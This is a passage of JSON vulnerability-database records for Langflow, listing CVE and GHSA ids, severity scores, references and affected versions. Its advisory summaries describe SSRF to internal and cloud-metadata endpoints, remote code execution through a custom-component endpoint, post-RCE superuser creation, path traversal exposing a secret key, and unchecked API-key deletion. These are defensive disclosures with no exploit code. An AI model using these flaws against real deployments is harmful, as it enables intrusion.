"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-27T15:01:06Z/" } ], "url": "https://vuldb.com/?submit.410043" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-9277", "reference_id": "CVE-2024-9277", "reference_type": "", "scores": [ { "value": "3.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-9277" }, { "reference_url": "https://github.com/advisories/GHSA-355v-2rjx-fpx7", "reference_id": "GHSA-355v-2rjx-fpx7", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-355v-2rjx-fpx7" } ], "fixed_packages": [], "aliases": [ "CVE-2024-9277", "GHSA-355v-2rjx-fpx7" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9k4q-zwxf-euh1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49487?format=api", "vulnerability_id": "VCID-bb6r-1f6u-t7ed", "summary": "Langflow vulnerable to Server-Side Request Forgery\n**Vulnerability Overview**\n\n\nLangflow provides an API Request component that can issue arbitrary HTTP requests within a flow. This component takes a user-supplied URL, performs only normalization and basic format checks, and then sends the request using a server-side httpx client. It does not block private IP ranges (127.0.0.1, the 10/172/192 ranges) or cloud metadata endpoints (169.254.169.254), and it returns the response body as the result.\n\nBecause the flow execution endpoints (/api/v1/run, /api/v1/run/advanced) can be invoked with just an API key, if an attacker can control the API Request URL in a flow, non-blind SSRF is possible—accessing internal resources from the server’s network context. This enables requests to, and collection of responses from, internal administrative endpoints, metadata services, and internal databases/services, leading to information disclosure and providing a foothold for further attacks.\n\n**Vulnerable Code**\n\n1. When a flow runs, the API Request URL is set via user input or tweaks, or it falls back to the value stored in the node UI.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-68477", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00027", "scoring_system": "epss", "scoring_elements": "0.0811", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-68477" }, { "reference_url": "https://github.com/langflow-ai/langflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68477", "reference_id": "CVE-2025-68477", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68477" }, { "reference_url": "https://github.com/advisories/GHSA-5993-7p27-66g5", "reference_id": "GHSA-5993-7p27-66g5", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5993-7p27-66g5" }, { "reference_url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-5993-7p27-66g5", "reference_id": "GHSA-5993-7p27-66g5", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-19T17:23:37Z/" } ], "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-5993-7p27-66g5" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48829?format=api", "purl": "pkg:pypi/langflow@1.7.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1ynd-c2hz-53hx" }, { "vulnerability": "VCID-2195-gd33-xbdp" }, { "vulnerability": "VCID-2649-thqq-r3d2" }, { "vulnerability": "VCID-4swq-hbjm-3ucd" }, { "vulnerability": "VCID-q4r1-xjfk-7bg9" }, { "vulnerability": "VCID-rc54-gw71-gyau" }, { "vulnerability": "VCID-rrva-95s5-kbcf" }, { "vulnerability": "VCID-u8mw-7znw-rfab" }, { "vulnerability": "VCID-v5pc-pdm9-97g8" }, { "vulnerability": "VCID-ypxh-x2hy-3uhb" }, { "vulnerability": "VCID-zqwj-45w7-7kft" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.7.1" } ], "aliases": [ "CVE-2025-68477", "GHSA-5993-7p27-66g5" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bb6r-1f6u-t7ed" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/36813?format=api", "vulnerability_id": "VCID-ef87-295y-zbha", "summary": "Langflow through 0.6.19 allows remote code execution if untrusted users are able to reach the \"POST /api/v1/custom_component\" endpoint and provide a Python script.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-37014", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0596", "scoring_system": "epss", "scoring_elements": "0.90832", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-37014" }, { "reference_url": "https://github.com/langflow-ai/langflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow" }, { "reference_url": "https://github.com/langflow-ai/langflow/issues/1973", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-12T14:47:28Z/" } ], "url": "https://github.com/langflow-ai/langflow/issues/1973" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/langflow/PYSEC-2024-177.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/langflow/PYSEC-2024-177.yaml" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37014", "reference_id": "CVE-2024-37014", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37014" }, { "reference_url": "https://github.com/advisories/GHSA-qg33-x2c5-6p44", "reference_id": "GHSA-qg33-x2c5-6p44", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qg33-x2c5-6p44" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/41729?format=api", "purl": "pkg:pypi/langflow@1.0.0a3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1dek-kvzf-27d1" }, { "vulnerability": "VCID-1ynd-c2hz-53hx" }, { "vulnerability": "VCID-2195-gd33-xbdp" }, { "vulnerability": "VCID-2649-thqq-r3d2" }, { "vulnerability": "VCID-9k4q-zwxf-euh1" }, { "vulnerability": "VCID-bb6r-1f6u-t7ed" }, { "vulnerability": "VCID-ef87-295y-zbha" }, { "vulnerability": "VCID-fc5h-qc2t-xqc3" }, { "vulnerability": "VCID-jt18-vv56-2fgx" }, { "vulnerability": "VCID-ncvf-vzqr-uydz" }, { "vulnerability": "VCID-q4r1-xjfk-7bg9" }, { "vulnerability": "VCID-qwtw-q92t-quhz" }, { "vulnerability": "VCID-rc54-gw71-gyau" }, { "vulnerability": "VCID-s17d-sfjq-z7eg" }, { "vulnerability": "VCID-sbea-kkfu-akgb" }, { "vulnerability": "VCID-u8mw-7znw-rfab" }, { "vulnerability": "VCID-v5pc-pdm9-97g8" }, { "vulnerability": "VCID-wv26-29b9-vqgg" }, { "vulnerability": "VCID-ypxh-x2hy-3uhb" }, { "vulnerability": "VCID-ysnc-jyxb-6qcy" }, { "vulnerability": "VCID-zqwj-45w7-7kft" }, { "vulnerability": "VCID-ztx2-wefa-c7bk" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.0.0a3" }, { "url": "http://public2.vulnerablecode.io/api/packages/44818?format=api", "purl": "pkg:pypi/langflow@1.0.15", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1dek-kvzf-27d1" }, { "vulnerability": "VCID-1ynd-c2hz-53hx" }, { "vulnerability": "VCID-2195-gd33-xbdp" }, { "vulnerability": "VCID-2649-thqq-r3d2" }, { "vulnerability": "VCID-4swq-hbjm-3ucd" }, { "vulnerability": "VCID-9k4q-zwxf-euh1" }, { "vulnerability": "VCID-bb6r-1f6u-t7ed" }, { "vulnerability": "VCID-fc5h-qc2t-xqc3" }, { "vulnerability": "VCID-jt18-vv56-2fgx" }, { "vulnerability": "VCID-ncvf-vzqr-uydz" }, { "vulnerability": "VCID-q4r1-xjfk-7bg9" }, { "vulnerability": "VCID-qwtw-q92t-quhz" }, { "vulnerability": "VCID-rc54-gw71-gyau" }, { "vulnerability": "VCID-sbea-kkfu-akgb" }, { "vulnerability": "VCID-u8mw-7znw-rfab" }, { "vulnerability": "VCID-v5pc-pdm9-97g8" }, { "vulnerability": "VCID-wv26-29b9-vqgg" }, { "vulnerability": "VCID-ypxh-x2hy-3uhb" }, { "vulnerability": "VCID-ysnc-jyxb-6qcy" }, { "vulnerability": "VCID-zqwj-45w7-7kft" }, { "vulnerability": "VCID-ztx2-wefa-c7bk" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.0.15" } ], "aliases": [ "CVE-2024-37014", "GHSA-qg33-x2c5-6p44", "PYSEC-2024-177" ], "risk_score": 4.4, "exploitability": "0.5", "weighted_severity": "8.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ef87-295y-zbha" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/57968?format=api", "vulnerability_id": "VCID-fc5h-qc2t-xqc3", "summary": "Langflow Vulnerable to Privilege Escalation via CLI Superuser Creation (Post-RCE)\nA privilege escalation vulnerability exists in Langflow containers where an authenticated user with RCE access can invoke the internal CLI command **langflow superuser** to create a new administrative user. This results in full superuser access, even if the user initially registered through the UI as a regular (non-admin) account.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-57760", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04413", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-57760" }, { "reference_url": "https://github.com/langflow-ai/langflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow" }, { "reference_url": "https://github.com/langflow-ai/langflow/commit/c188ec113c9ca46154ad01d0eded1754cc6bef97", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-08-25T20:34:06Z/" } ], "url": "https://github.com/langflow-ai/langflow/commit/c188ec113c9ca46154ad01d0eded1754cc6bef97" }, { "reference_url": "https://github.com/langflow-ai/langflow/pull/9152", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow/pull/9152" }, { "reference_url": "http://github.com/langflow-ai/langflow/pull/9152", "reference_id": "9152", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-08-25T20:34:06Z/" } ], "url": "http://github.com/langflow-ai/langflow/pull/9152" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57760", "reference_id": "CVE-2025-57760", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57760" }, { "reference_url": "https://github.com/advisories/GHSA-4gv9-mp8m-592r", "reference_id": "GHSA-4gv9-mp8m-592r", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-4gv9-mp8m-592r" }, { "reference_url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-4gv9-mp8m-592r", "reference_id": "GHSA-4gv9-mp8m-592r", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-08-25T20:34:06Z/" } ], "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-4gv9-mp8m-592r" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/46615?format=api", "purl": "pkg:pypi/langflow@1.5.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1ynd-c2hz-53hx" }, { "vulnerability": "VCID-2195-gd33-xbdp" }, { "vulnerability": "VCID-2649-thqq-r3d2" }, { "vulnerability": "VCID-4swq-hbjm-3ucd" }, { "vulnerability": "VCID-bb6r-1f6u-t7ed" }, { "vulnerability": "VCID-ncvf-vzqr-uydz" }, { "vulnerability": "VCID-q4r1-xjfk-7bg9" }, { "vulnerability": "VCID-qwtw-q92t-quhz" }, { "vulnerability": "VCID-rc54-gw71-gyau" }, { "vulnerability": "VCID-rrva-95s5-kbcf" }, { "vulnerability": "VCID-sbea-kkfu-akgb" }, { "vulnerability": "VCID-u8mw-7znw-rfab" }, { "vulnerability": "VCID-v5pc-pdm9-97g8" }, { "vulnerability": "VCID-ypxh-x2hy-3uhb" }, { "vulnerability": "VCID-ysnc-jyxb-6qcy" }, { "vulnerability": "VCID-zqwj-45w7-7kft" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.5.1" } ], "aliases": [ "CVE-2025-57760", "GHSA-4gv9-mp8m-592r" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fc5h-qc2t-xqc3" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/56121?format=api", "vulnerability_id": "VCID-jt18-vv56-2fgx", "summary": "Langflow vulnerable to remote code execution\nlangflow <=1.0.18 is vulnerable to Remote Code Execution (RCE) as any component provided the code functionality and the components run on the local machine rather than in a sandbox.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-48061", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.132", "scoring_system": "epss", "scoring_elements": "0.94274", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-48061" }, { "reference_url": "https://gist.github.com/AfterSnows/1e58257867002462923fd62dde2b5d61", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:P" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-11-06T19:16:58Z/" } ], "url": "https://gist.github.com/AfterSnows/1e58257867002462923fd62dde2b5d61" }, { "reference_url": "https://github.com/langflow-ai/langflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:P" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow" }, { "reference_url": "https://github.com/langflow-ai/langflow/issues/696", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:P" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow/issues/696" }, { "reference_url": "https://rumbling-slice-eb0.notion.site/There-is-a-Remote-Code-Execution-RCE-vulnerability-in-the-repository-https-github-com-langflow-a-105e3cda9e8c800fac92f1b571bd40d8", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:P" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-11-06T19:16:58Z/" } ], "url": "https://rumbling-slice-eb0.notion.site/There-is-a-Remote-Code-Execution-RCE-vulnerability-in-the-repository-https-github-com-langflow-a-105e3cda9e8c800fac92f1b571bd40d8" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-48061", "reference_id": "CVE-2024-48061", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:P" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-48061" }, { "reference_url": "https://github.com/advisories/GHSA-5p5r-57fx-pmfr", "reference_id": "GHSA-5p5r-57fx-pmfr", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-5p5r-57fx-pmfr" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/44822?format=api", "purl": "pkg:pypi/langflow@1.0.19", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1dek-kvzf-27d1" }, { "vulnerability": "VCID-1ynd-c2hz-53hx" }, { "vulnerability": "VCID-2195-gd33-xbdp" }, { "vulnerability": "VCID-2649-thqq-r3d2" }, { "vulnerability": "VCID-4swq-hbjm-3ucd" }, { "vulnerability": "VCID-bb6r-1f6u-t7ed" }, { "vulnerability": "VCID-fc5h-qc2t-xqc3" }, { "vulnerability": "VCID-ncvf-vzqr-uydz" }, { "vulnerability": "VCID-q4r1-xjfk-7bg9" }, { "vulnerability": "VCID-qwtw-q92t-quhz" }, { "vulnerability": "VCID-rc54-gw71-gyau" }, { "vulnerability": "VCID-sbea-kkfu-akgb" }, { "vulnerability": "VCID-u8mw-7znw-rfab" }, { "vulnerability": "VCID-v5pc-pdm9-97g8" }, { "vulnerability": "VCID-wv26-29b9-vqgg" }, { "vulnerability": "VCID-ypxh-x2hy-3uhb" }, { "vulnerability": "VCID-ysnc-jyxb-6qcy" }, { "vulnerability": "VCID-zqwj-45w7-7kft" }, { "vulnerability": "VCID-ztx2-wefa-c7bk" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.0.19" } ], "aliases": [ "CVE-2024-48061", "GHSA-5p5r-57fx-pmfr" ], "risk_score": 4.4, "exploitability": "0.5", "weighted_severity": "8.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jt18-vv56-2fgx" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37252?format=api", "vulnerability_id": "VCID-ncvf-vzqr-uydz", "summary": "Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.1, in the download_profile_picture function of the /profile_pictures/{folder_name}/{file_name} endpoint, the folder_name and file_name parameters are not strictly filtered, which allows the secret_key to be read across directories. Version 1.7.1 contains a patch.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33497", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15912", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33497" }, { "reference_url": "https://github.com/langflow-ai/langflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow" }, { "reference_url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-ph9w-r52h-28p7", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-24T17:45:18Z/" } ], "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-ph9w-r52h-28p7" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33497", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33497" }, { "reference_url": "https://github.com/advisories/GHSA-ph9w-r52h-28p7", "reference_id": "GHSA-ph9w-r52h-28p7", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-ph9w-r52h-28p7" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48829?format=api", "purl": "pkg:pypi/langflow@1.7.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1ynd-c2hz-53hx" }, { "vulnerability": "VCID-2195-gd33-xbdp" }, { "vulnerability": "VCID-2649-thqq-r3d2" }, { "vulnerability": "VCID-4swq-hbjm-3ucd" }, { "vulnerability": "VCID-q4r1-xjfk-7bg9" }, { "vulnerability": "VCID-rc54-gw71-gyau" }, { "vulnerability": "VCID-rrva-95s5-kbcf" }, { "vulnerability": "VCID-u8mw-7znw-rfab" }, { "vulnerability": "VCID-v5pc-pdm9-97g8" }, { "vulnerability": "VCID-ypxh-x2hy-3uhb" }, { "vulnerability": "VCID-zqwj-45w7-7kft" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.7.1" } ], "aliases": [ "CVE-2026-33497", "GHSA-ph9w-r52h-28p7", "PYSEC-2026-81" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ncvf-vzqr-uydz" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37246?format=api", "vulnerability_id": "VCID-q4r1-xjfk-7bg9", "summary": "Langflow is a tool for building and deploying AI-powered agents and workflows. In versions prior to 1.9.0, the delete_api_key_route() endpoint accepts an api_key_id path parameter and deletes it with only a generic authentication check (get_current_active_user dependency). However, the delete_api_key() CRUD function does NOT verify that the API key belongs to the current user before deletion.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33053", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.18188", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33053" }, { "reference_url": "https://github.com/langflow-ai/langflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow" }, { "reference_url": "https://github.com/langflow-ai/langflow/commit/fdc1b3b1448ff3317d73d3e769a6c4a1717f74d7", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow/commit/fdc1b3b1448ff3317d73d3e769a6c4a1717f74d7" }, { "reference_url": "https://github.com/langflow-ai/langflow/releases/tag/1.7.2", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow/releases/tag/1.7.2" }, { "reference_url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-rf6x-r45m-xv3w", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "6.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:L" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T16:22:42Z/" } ], "url": 